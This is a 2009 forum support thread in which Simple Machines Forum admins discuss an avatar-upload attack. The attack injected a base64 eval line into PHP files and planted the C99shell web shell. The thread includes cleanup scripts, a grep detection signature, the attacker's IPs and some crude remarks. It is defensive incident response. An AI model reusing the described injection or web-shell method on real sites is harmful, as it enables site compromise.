Why? So i can add a signature to ZB Block (http://www.spambotsecurity.com/zbblock.php) to stop it cold. I at least want to protect against everything that needs to be done after they upload the malevolent avatar.

From what I gather, it requires a null truncation (%00) on the filename given to "pop" the .gif/.jpg/.png extention off the top and leave the upload as a .php ? (If so ZB Block allready knows this attack).

Since I am not a user of SMF myself, I could use any input regarding the adding of signatures to ZB Block that would help wrap SMF in a layer of protection.

Zap :)

My site got hacked by krisbarteo too.  He or it registered an account probably about a week ago.  Yesterday I changed by theme to a dark background and noticed his avatar was just a white box, and thought that was weird.  Then my avatar disappeared and some attachments weren't showing up.  I checked my source code, and saw a bunch of spam after the <body> tag and new I had been hacked.  I had to go through all my php files and delete the base64 code at the top.

I'm wondering if this is just a bot, because my site is fairly new and doesn't have an active base, so I'm not sure why "krisbarteo" would waste his time on my site.  As far as attachments, can't we just check the box that checks the file extension against .php?  I just limit attachments with users with 25 posts or more, but I disabled avatars for now.

He takes the time because your site now provides a convenient source for installing other malware for anyone that visits with the right browser/OS/click combination.

QuoteSimpleMachines should have warned everybody through our SMF Admin panel - I'm sure it would have prevented many of the hackings.

We hope to release a patch in the next few days, but we've found some serious bugs as a result of the changes.

In the interim, I believe disabling attachments and user-uploaded avatars should prevent the injection from being uploaded.

We are already working on a patch for this which will be released once between the developers, the team, and the beta testers, we've worked all the bugs out.  If we released it right now, your attachment and avatar systems would not work.

I'd like to note that this is *not* just a patch to close a small hole, this is a patch to prevent this type of attack from being possible again.  This patch will beef up attachment and avatar security significantly.  Though it is technically a new security enhancement "feature", the patch will still cover 1.0, 1.1, and 2.0 despite all three being feature locked.

The reason for this change is twofold:
1.) The pattern of the last SMF exploits has been alterations of prior exploits pertaining to poisoned attachments and avatars.  Rather than close one small hole, we are opting to close the possibility of this type of attack coming up again.
2.) IE6 will pretty much run just about anything injected into an image blindly without thinking twice about it.  This could infect your computer (as others alluded to above).

If you've already experienced the hack, i reccommend virus scanning your computer as well.

Again, i'd suggest disabling your attachment and avatar uploads temporarily until the patch is out.  Everyone should also make sure there are no rows for themes in the themes table that should not exist.

I also recommend disallowing members to select themes. This can be done at Admin > Themes and Layout.

Thanks you. Does it make any difference if we are one of the those that changed the upload path for user-uploaded avatars out of the attachment's folder? Just curious if this will make any difference on applying the patch or how useful it will be. Thanks.

My entire forum is gone. That hacker got into my forum and just as I was deleting him, the forum disappeared

http://www.brokenarrowspeacepipe.com/forum2/

I have tried to restore the back up file through the cpanel  but I still cannot get the forum to come online


Is my only option to rebuild from scratch?

You could download the "large upgrade" package from our downloads page and use that to completely refresh and overwrite (thus sanitizing) all of your forums files.  Just make sure to delete all the files starting with "upgrade".

However, any custom mod files and such -- php files that aren't part of the default distribution -- will need to be sanitized by hand.

Any such mods would also need to be reinstalled

thanks Metallica

That pretty much leaves me rebuilding it from scratch. I had alot of modifications added to the theme files I had used. Not to mention the mods added

geez, what a nightmare

In general, after uploading the SMF upgrade package, you should verify every file that is not part of the SMF distribution; this includes verifying all avatars, attachments, custom theme files etc.

Quote from: StarWars Fan on May 16, 2009, 03:10:42 PM
Can anybody confirm or not whether disabling users to choose their own theme will stop this hack?

It's possible that disabling theme selection is enough, but I would disable all kinds of uploads as well, at least until the patch comes out.

Quote from: metallica48423 on May 16, 2009, 02:35:34 PM
<<< also make sure there are no rows for themes in the themes table that should not exist.

I don't mean to sound dopey, but what SHOULD be there so we I (we) know when something is out of place. Near as I can tell this @$$hat hasn't gotten into my site, but I'm not sure what rows are supposed to be there in the first place. To me it doesn't look like anything out of place is there, but you guys would know better than I would.

Sort by ID_THEME descending and look for ID_THEME = 32, as well as for any values (in the value column) that end with a \0 character (it usually looks like a black diamond with a question mark inside).

One would have to wonder if just adding a delete command to the upload task, that would delete all *.php files in the upload directory would be good enough...

Or, perhaps upload to a directory other than the normal avatar directory, then have the whole of the directory copied into the accessible one, but only coping *.jpg, *.gif, and *.png files, and skipping pre-existing ones at the end of upload.

Good luck folks,
Zap

Quote from: Sarge on May 16, 2009, 03:23:56 PM
Sort by ID_THEME descending and look for ID_THEME = 32, as well as for any values (in the value column) that end with a \0 character (it usually looks like a black diamond with a question mark inside).

Mine looks clean. I've had it torqued down pretty good for quite a while, but I'm wondering if the fact that I never had user selectable themes enabled at all might be the clincher. Also have recaptcha, are you human, puzzle and clock mods along with stop spammer and Unrecognizable Form. Not to mention having the PHP engine disabled for avatar and attachment directories. Password protected docroot too. I also killed all the ip info that's come up with this guy on my router.

Zaphod,

The point is that we alreayd sanitize uploads and do not allow php files.   What this hacker is doing is uploading a .jpg file that contains php code...

K, I thought they were using a null truncator (%00) to slice off the .jpg (or whatever) when it hit the filesystem.

Nevermind. Still hoping there is a record somewhere of the URL they use to launch this, and if there's anything in it that is unique enough it can be added as a hostile action to my pre-parser script.

Thanks,
Zap.

Quote from: metallica48423 on May 16, 2009, 02:35:34 PM
We hope to release a patch in the next few days, but we've found some serious bugs as a result of the changes.

In the interim, I believe disabling attachments and user-uploaded avatars should prevent the injection from being uploaded.

We are already working on a patch for this which will be released once between the developers, the team, and the beta testers, we've worked all the bugs out.  If we released it right now, your attachment and avatar systems would not work.

I'd like to note that this is *not* just a patch to close a small hole, this is a patch to prevent this type of attack from being possible again.  This patch will beef up attachment and avatar security significantly.  Though it is technically a new security enhancement "feature", the patch will still cover 1.0, 1.1, and 2.0 despite all three being feature locked.

I can't begin to imagine how much work this entails ... especially the 'debugging' process.  I know from working with some other automation that spotting, chasing down, and remedying the bugs can be both infuriating and the most time consuming portion of the process.  I appreciate all the effort that goes into coming up with a reliable, stable patch. 

As someone said earlier (I think it was JBlaze), I've got the three forums I run locked up tighter than a crab's ass.  Pre-banning KrisBarteo and his IP has gone a long way in terms of defenses.  As of this evening, he has tried to register at all three forums now, and has been turned away.  I can wait quite patiently for the patch.  ;) 

I managed to restore most of my database. I have discovered that the hacker used a 2nd name:  stilusmagic

I don't know if that has been shared with you already but it's the same IP as the other hacker name

So avatars linked from other image hosters are still safe? Did I understand that correctly?


And has anyone planned to do legal actions against that hacker, i.e. make a criminal complaint at the local police station?

Quote from: ConquerorOfMankind on May 16, 2009, 07:51:12 PM
So avatars linked from other image hosters are still safe? Did I understand that correctly?

Yes, but uncheck "Download avatar at given URL" in Admin > Attachments and Avatars > Avatar Settings tab.

From the help text: "With this option enabled, the URL given by the user is accessed to download the avatar at that location. On success, the avatar will be treated as uploadable avatar." So I don't recommend enabling it.

Ok thanks. I hope there will be an update soon.

And is SMF 2.x concerned by that? What I have read before seems only to be 1.1.8.

Quote from: ConquerorOfMankind on May 16, 2009, 08:34:49 PM
Ok thanks. I hope there will be an update soon.

And is SMF 2.x concerned by that? What I have read before seems only to be 1.1.8.

It is also a problem in 2.0 but so far I have not seen an infected 2.0 version. (knock on wood)

All three branches of SMF are currently affected by this

Quote from: Broken Arrow on May 16, 2009, 07:39:25 PM
I managed to restore most of my database. I have discovered that the hacker used a 2nd name:  stilusmagic

I don't know if that has been shared with you already but it's the same IP as the other hacker name

I have them also (blocked) in a member base but with diferent IP than krisbarteo 78.157.140.2 and this mail address: [email protected]

Just a info., so you can check and block this IP ASAP.  ;)

Thank you for the reply.  :)

It seems that I have to remember my old days  ;D

Quote from: stardx on May 16, 2009, 08:04:31 AM

Quote from: agridoc on May 15, 2009, 06:54:34 AMI am looking for a cleaning script that would

- First ask for input of the string to search (the injected code).
- Search recursively the domain for the incidence of PHP files and build an array.
- Use this array to open and search each PHP file and, if found, delete the string (the injected code).

Such a cleaning script would be greatly appreciated, even by supporters.

dunno if you found a script by now, i have done just that with a simple find/sed on shell routine recently.

Code Select Expand


nohup find /tmp/web13 -name "*.php" -exec grep "aWYoZnVuY3Rpb25" {} ; -print -exec clear.sh {} ; | grep tmp &


clear.sh:

Code Select Expand


#!/bin/bash

mkdir -p /tmp/backup`dirname $1`

sed -e '1d' $1 > /tmp/backup$1

mv $1 $1.hack 2>/dev/null

mv /tmp/clemensbackup$1 $1 2>/dev/null


you could even do it with "sed -i" command in one line, i had to copy/move all the files cause i did on a curlftpfs mounted device.

When you tip in Google the Word "krisbarteo"

You will becom more than 20 Sites of SMF Forums!!

Quote from: GOAT15 on May 17, 2009, 05:07:03 AM
When you tip in Google the Word "krisbarteo"

You will becom more than 20 Sites of SMF Forums!!

I was find exactly 670 indexed entries, if we add some % of no indexed forums... it's obvious that this Exploit become worst with every new min.

I hate this hacker  :-X

pls god protect all SMF Forums  O:)

Quote from: GOAT15 on May 17, 2009, 07:15:01 AM
I hate this hacker  :-X

pls god protect all SMF Forums  O:)

Lol, God have nothing with that... :)

ok so if my forum was hacked (thank god only ONE of my forums allowed uploadable avs!) and I installed a fresh install of SMF - is it safe now?  or do I have to still find that user and delete him?  and if so how do I figure out which user it is?

or can I just empty out the attachments directory and then their script won't run anymore?

No, we still waiting for patch to be released...
Read this topic for info:
http://www.simplemachines.org/community/index.php?topic=309717.0

I just had krisbarteo register on one of my sites but his account was blocked by the spammers mod. I sent him an email stating that his actions weren't appreciated by the SMF community, although not as politely as that  8)

Quote from: thebofh on May 17, 2009, 10:46:32 AM
I just had krisbarteo register on one of my sites but his account was blocked by the spammers mod. I sent him an email stating that his actions weren't appreciated by the SMF community, although not as politely as that  8)

And now to wait for a reply :P

Quote from: LexArma on May 17, 2009, 10:49:46 AM

Quote from: thebofh on May 17, 2009, 10:46:32 AM
I just had krisbarteo register on one of my sites but his account was blocked by the spammers mod. I sent him an email stating that his actions weren't appreciated by the SMF community, although not as politely as that  8)

And now to wait for a reply :P

I doubt if he has enough time in the day to reply to all his abusive emails, or even a fraction of them, what a tosspot! I'm sure it's some teenage scumbag Eastern European script kiddie who doesn't even understand what's he's doing apart from following instructions from a real hacker.

I wasn't exactly serious there :P Didn't think he would respond...

My advice is to just:
IGNORE HIM
This kind of internet abusers are the lowest of the low and motley attention seekers & enjoy any replies however abusive they are
Don't give them their treat & just ignore them

Unfortunately, most hackers these days are apparently working (for pay) for spammers, rather than for the thrill and attention. They're cyberterrorists and it would be good to shoot the lot of them. It will eventually come to the point where the Internet has to be handed over to national Post Offices and postage be charged for every packet transmitted. Once it's no longer free, it will not be nearly so lucrative to spam. A side benefit will be that it will be cheaper to buy a legit CD or DVD than to download a pirated copy, thus greatly reducing piracy. The only losers will be hobbyists who download large software projects.

Your friend (dripping sarcasm on the word "friend") krisbarteo has been seen in these IP blocks.

77.92.88.0 - 77.92.89.255 ... LIMT Group, Suspected RBN
78.129.202.0 - 78.129.203.255 ... LIMT Group, Suspected RBN
78.157.140.0 - 78.157.143.255 ... Known RBN block

It is appearing that this is a major incursion by the RBN (Russian Business Network).

God be with us all against the red menace.

Zap :(

P.S. There are several more ranges the RBN squirts out of. Sorry about tooting my own horn here, but ZB Block (http://www.spambotsecurity.com/zbblock.php) does block most of them. You might try it out for the time being, as it's GPL freeware.

what do i need to do check my database for this hack?

when i cleaned up my SMF installation i compressed the corrupt public_html directory and downloaded it. i was just going through it now to see how much damage had been done but it does not look like the hack has gotten into too many files. however i tried to rename the folder and i am being denied access to it. is it possible that this contains some kind of virus that is run when the files are open on my own computer?

I had both krisbarteo and stilusmagic try and register early in may but my spam protection got them.

However, I did get caught with SanyaKill in March (before Spam protection) who uploaded an avatar that somehow had C99shell as part of it. He/she then got stuck in and had some fun by adding links to all my php files. I have resolved this by restricting the uploading of avatars or attachments until a member has posted a number of times.

As a rule, I have automatically banned anything with a .ru in it. Sorry Russia

can someone tell me which mod stops these things the best? I had tried the Stop Spam mod but it messed up the members list and did not show any of the images it was supposed to. I unistalled it and the list returned to normal

I wouldn't contact this spam guy in any way. I made the mistake of sending out a mass email to alert people to the missing avatar problem before I came here and saw what was causing the problem. I had another window open with my site up and saw that my mass email alerted him to come to my site. He showed up as a member online and then in a matter of minutes my site crashed completely...right before my eyes. I don't know what this guy did but files just disappeared off the server.

He probably used C99shell. Do yourself a favour and look it up on google. Once they get it on your site, they can do things you would not believe. It was on my site as img.php in the attachments folder, and then once they were in the transfered it to my root directory. A friend had it on his site as dir.php. I was in such a hurry to delete, that I never checked the size, but looking it up elsewhere, its about 47,029 bytes.

Worth checking every now and again. I have been looking for something that will scan and compare the files you should have on the server and what is there at present.

I looked it up robone.

I am not experienced enough to understand all the talk about codes and scripts. I was reading this site: http://www.webhostingtalk.com/showthread.php?p=4703619 and it all just went over my head. I have taught myself as I go over the past few years. Protecting my site from this kind of attack is out of my league

Quote from: JBlaze™ on May 04, 2009, 04:47:53 PM

Quote from: Agent Orange on May 04, 2009, 04:44:33 PM
I have this same problem. I removed and banned krisbarteo, now I'll have to re-upload new php-files.

Quote from: Kat on May 01, 2009, 12:50:54 PMDO NOT OVERWRITE Settings.php

:( I found the same code in my main index file. So I've got to go through all of them to see whats wrong? Dur. Oh well. Better to know whats wrong rather than to go in blindfolded.
I believe I actually did that first time around. What effect did it have on my forum?

Settings.php is what controls the connection between your forum and your database. It contains all the login info needed to connect.

To reset your Settings.php so it can connect back to your forum, use the repair_settings.php tool What is repair_settings.php? (http://docs.simplemachines.org/index.php?topic=663)

Does anybody know what the Hack does?

It does spread in all the *.php files available but that can'nt really be what krisbarteo is up to, can it?
Do I have to tell my members that I infected their computer?
Did he use my Forum to distribute SPAM ?
Or did he just use my Forum to store 230MB of stuff in my /Themes/default/languages Folder?

Thank you

The ultimate purpose seems to be linkspam... The hack adds loads of hidden links on your forum....

So far, all we know as of now is that there is code injected into random, or seemingly random, php files. Also, there have been reports of some database tables getting injected as well.

I, personally, have not seen any spam or viruses etc. come from this attack, but that doesn't mean anything.

I'm sure there will be a detailed report on this once the security patch comes out, so keep your eyes peeled.

We had lots of files deleted, including those outside of the SMF install: anything with "log" contained in it including blog, login, logo, logout...

Sounds like a pretty smart hacker, trying to cover up after himself.... ::)

Edit: Nevermind.  That line of code is definitely NOT supposed to be there.  Time for a reinstall :(

Quote from: LexArma on May 18, 2009, 08:31:29 AM
The ultimate purpose seems to be linkspam... The hack adds loads of hidden links on your forum....

OK, thats kind of a relieve to me because it means that I can get rid of it without having any persistent damage done to my Board.

Quote from: JBlaze on May 18, 2009, 08:33:13 AM
So far, all we know as of now is that there is code injected into random, or seemingly random, php files. Also, there have been reports of some database tables getting injected as well.

How do I know if my tables got injected? I have about 300k Posts and 3k Users I can't check everything by myself...

I'd like to know too Niklas_ but I'm not sure what to tell you.
BUT!
It also can get to your root site
Say you have www.mysite.com/forums/
If you have any pages (HTML, PHP, etc) make sure you REMOVE THE CODE IN THERE!
If the bot got through to you then it also got to the main site. If not, CHECK TO BE SURE!!!
It got to mine. :( BUT! I have a backup of the mainsite :D

lord, I just checked this morning and that code is on every single php file. I have subdreamer for the portal and several word press blogs and it's in all of them

I guess I have to go through each file manually and remove the code.

I did run a virus scan on my whole site and it said it showed no virus but I still don't trust this

Quote from: Broken Arrow on May 18, 2009, 10:01:07 AM
lord, I just checked this morning and that code is on every single php file. I have subdreamer for the portal and several word press blogs and it's in all of them

I guess I have to go through each file manually and remove the code.

I did run a virus scan on my whole site and it said it showed no virus but I still don't trust this

Someone's bypassing using Bots Simple Machine forums and using them and their root sites (www.blah.com) whatever is before /forum/ to create spam or do whatever they want. My site's email was accessed and be sure to check for NEW files that we're created.

I had one called "help.php" created, I know I didn't put it there and if I went to it it bypassed my FTP and had a single page view of everything that was on the site and basically was a .php version of an FTP page. The only way that I found works to delete it is to open the help.php and use it to remove itself.

Hope this more amount of information helps.

Also, I looked in my logs (for the emails sent out) and the email address that it used was: [email protected]

I don't see a help.php file in my files. But I will go over it and be sure it isn't hidden in some folder I haven't looked in yet

I can't access the admin panel of my subdreamer section so I am reinstalling those files. I have one Word Press blog that seems to be messed up but the others look ok. For now


this is truly a mess. I'll be working on this all week I guess

My email seems to be clean..that's a good thing

OK, I did delete (nearly) all of the files on my webspace and uploaded a Backup. (except of htaccess and Settings.php)

Next I created a new Backup from my Database and was pretty scared because it differd to an old Backup in 20MB! (about 1/4) so I compared the two backups only looking at the differences using the linx command line tool diff:
diff -E -b -w -B -a --text --suppress-common-lines *old_backup*.sql *new_backup*.sql > diff.txt


In the end it turned out that most of the differences were error-logs which. I did not check every other entry but I for the smf_messages entries I did check I could not find anything that should not be there....

So now I am going to put my Forum back online (disabling avatar upload for new Members (Members that are not in specific groups), disabling new attachments and not allowing members to choose a template other than my default template. 

Is there any risk that modifications like the smf gallery can be unsafe to use in that way?

got me too - avatars missing, I look through php files and they all have the same line at the top now:

<?php /**/eval(base64_decode('................alphanumeric jibberish...............')); ?>

does everyone think this hacker went to a bunch of random SMF sites and did an sql-injection, or might it be possible that the section in admin that gives you updates from SMF was somehow hacked?

every php file on my site has that line in my previous post in it - not just the smf folder, so I don't know...

Quote from: jackulator on May 18, 2009, 01:39:09 PM
does everyone think this hacker went to a bunch of random SMF sites and did an sql-injection, or might it be possible that the section in admin that gives you updates from SMF was somehow hacked?

Neither - it has been established here, that this was done with a file upload...

here's the IP I had for the krisbarteo guy: 94.142.129.147

is this the same IP everyone else found? if he was dumb enough not to use a proxie I think a call to his ISP is in order - at the very least...

Looks familiar...

Mine had a link to "Luxorplay" posted in each php file. I checked most of the PHP files, and deleted the links, but I am still finding them in the help files.

From what I understand about C99Shell is that once they have access to your site, they can do a bulk add to all the php files. I had a look at the software, because a friend of mine managed to make a copy of it when he was infected, and it is powerful.

I don't think it was included with any upgrade. It gets in via uploaded avatars or attachments. And yes, again from what I understand, they try and see how many sites they can infect, so they identify all the smf sites and hack away.

I would look for the C99shell on your site, if you have been hacked, because if you have not found it, it i still there waiting for them to come back. As mentioned previously, I had 2 copies of it on mine. I was happy when I found the 1st one, and almost gave up looking, but then found the next one.

Quote from: robone on May 18, 2009, 02:07:10 PM
I would look for the C99shell on your site, if you have been hacked

I have some custom scripts to scan my site for common hacks (base64, etc.). Is there any consistent pattern that I could look for to detect the C99shell?

I am looking for a script to do exactly that.

I have seen scripts (search google) that look for C99shell and some other names, but, they change the name, so you need a script that will open each php file and check the code.

See http://www.viruslist.com/en/viruses/encyclopedia?virusid=188613     

The file is 229051 bytes in size, so you need a script that will search all the files for a php that size


There is another site that may help. http://www.elitehackers.info/forums/showthread.php?t=17712

See post #4

I must admit, I actually do not understand what they are saying

Quote from: robone on May 18, 2009, 02:55:09 PM
The file is 229051 bytes in size, so you need a script that will search all the files for a php that size

That wouldn't be hard to do (ls -alR | grep "229051"), but is it sufficient? Can this malware be trivially changed to be a slightly different size?

Quote
I must admit, I actually do not understand what they are saying

As best I can tell, PHP includes (and presumably requires) can be given a full URL rather than just a local file. In PHP 5 the inclusion of a URL is off by default, but it can be tricked into doing so? Anyway, it's not clear from the post whether this is something that C99shell does, or if it's something that is foisted on SMF's includes. Since SMF doesn't (AFAIK) include as names strings from user input, that shouldn't be a problem. I don't know if it uses a $_GET anywhere to bring in a file name (or URL) to be included -- I don't recall ever seeing such a thing. So, presumably, C99shell is doing this include or require to bring in a URL. Apparently, C99shell has to be "planted" in a separate operation first.

Quote from: jackulator on May 18, 2009, 01:50:28 PM
here's the IP I had for the krisbarteo guy: 94.142.129.147

is this the same IP everyone else found? if he was dumb enough not to use a proxie I think a call to his ISP is in order - at the very least...

That IP goes back to RIPE. It may as well be a proxy for all the good it does to try to track it. RIPE could care less.

Err, do you even know what RIPE is, why would RIPE care. Lookup the IP with RIPE and see who its actually allocated to, odds are though it's a zombie anyway.

The IP tracks to Latvia. I checked. Personally I banned a substantial IP range last night. 

The Idiot tried to register on my forums but were on member approval so i have set this ban for the ip: 94.142.129.*

If he comes back i will change it to the 129 octlet instead.

Quote from: Ben_S on May 18, 2009, 07:52:21 PM
Err, do you even know what RIPE is, why would RIPE care. Lookup the IP with RIPE and see who its actually allocated to, odds are though it's a zombie anyway.

Yes my dear I do understand what RIPE is. Because I know everyone is under a bit of strain, I won't take offense at being talked down to.

Now if anyone can track it further or make a complaint to them concerning this character, I would love to know how to do it too!

% This is the RIPE Whois query server #3.
% The objects are in RPSL format.
%
% The RIPE Database is subject to Terms and Conditions.
% See http://www.ripe.net/db/support/db-terms-conditions.pdf

% Note: This output has been filtered.
%       To receive output for a database update, use the "-B" flag.
% Information related to '94.142.129.128 - 94.142.129.255'
inetnum:         94.142.129.128 - 94.142.129.255
netname:         CSSGROUP-NET
descr:           SIA "CSS GROUP" hosting
org:             ORG-SG55-RIPE
country:         LV
admin-c:         CGN-RIPE
tech-c:          CGN-RIPE
status:          ASSIGNED PA
mnt-by:          CSSGROUP-MNT
source:          RIPE # Filtered
organisation:    ORG-SG55-RIPE
org-name:        SIA "CSS GROUP"
org-type:        LIR
address:         SIA "CSS GROUP"
                Caunas 7A-26
                LV-4101 Cesis
                LATVIA
phone:           +371 67 404544
fax-no:          +371 67 414545
admin-c:         DJ1401-RIPE
mnt-ref:         CSSGROUP-MNT
mnt-ref:         RIPE-NCC-HM-MNT
mnt-by:          RIPE-NCC-HM-MNT
source:          RIPE # Filtered
role:            CSS GROUP NOC
address:         Caunas 7A-26, Cesis, LV-4101, Latvia
phone:           +371 67 404544
fax-no:          +371 67 414545
abuse-mailbox:   [email protected]
admin-c:         DJ1401-RIPE
tech-c:          AC13043-RIPE
nic-hdl:         CGN-RIPE
source:          RIPE # Filtered
% Information related to '94.142.128.0/21AS48662'
route:           94.142.128.0/21
descr:           SIA "CSS GROUP"
origin:          AS48662
mnt-by:          CSSGROUP-MNT
source:          RIPE # Filtered